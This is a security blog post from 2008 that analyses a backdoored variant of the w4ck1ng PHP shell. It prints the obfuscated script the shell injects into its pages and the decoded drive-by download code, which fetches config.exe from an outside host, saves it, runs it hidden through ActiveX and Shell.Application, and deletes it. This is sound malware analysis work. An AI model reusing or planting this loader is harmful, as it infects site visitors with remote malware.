marco
blog
Menu:
Backdoored PHP shells
September 13, 2008
PHP shells are tools that attackers often use to manage compromised web servers. It turns out, some of these attackers may be attacked by their own tools.
In fact, PhishTank report
505183 shows a nice example of
a backdoor inserted in a PHP shell.
The shell in question is a variant of the w4ck1ng shell. Each page
generated by the shell contains the following script tag:
<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://reda-vision.com/config.exe";
var file="run.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,
44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) +
exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,
115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,
...
97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
</script>
After decoding the JavaScript code, a classic drive-by download attack is revealed:
var ailian,zhan,cmdss;
ailian="http://reda-vision.com/config.exe";
zhan="run.exe";
cmdss="cmd.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ln="Ado";
var lzn="db.St";
var an="ream";
var g=1;
var as=ado.createobject(ln+lzn+an,"");
var h=1;
xml.Open("GET",ailian,0);
xml.Send();
as.type=1;
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(zhan,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(zhan,"","","open",0);
shell.ShellExecute(cmdss," /c del /S /Q /F "+zhan,"","open",0);
} catch(e){};
The config.exe file is detected by one third of the antivirus tools used by VirusTotal, and, according to the Anubis report, behaves like a Bifrost variant.
To leave a comment, complete the form below. Mandatory fields are marked *.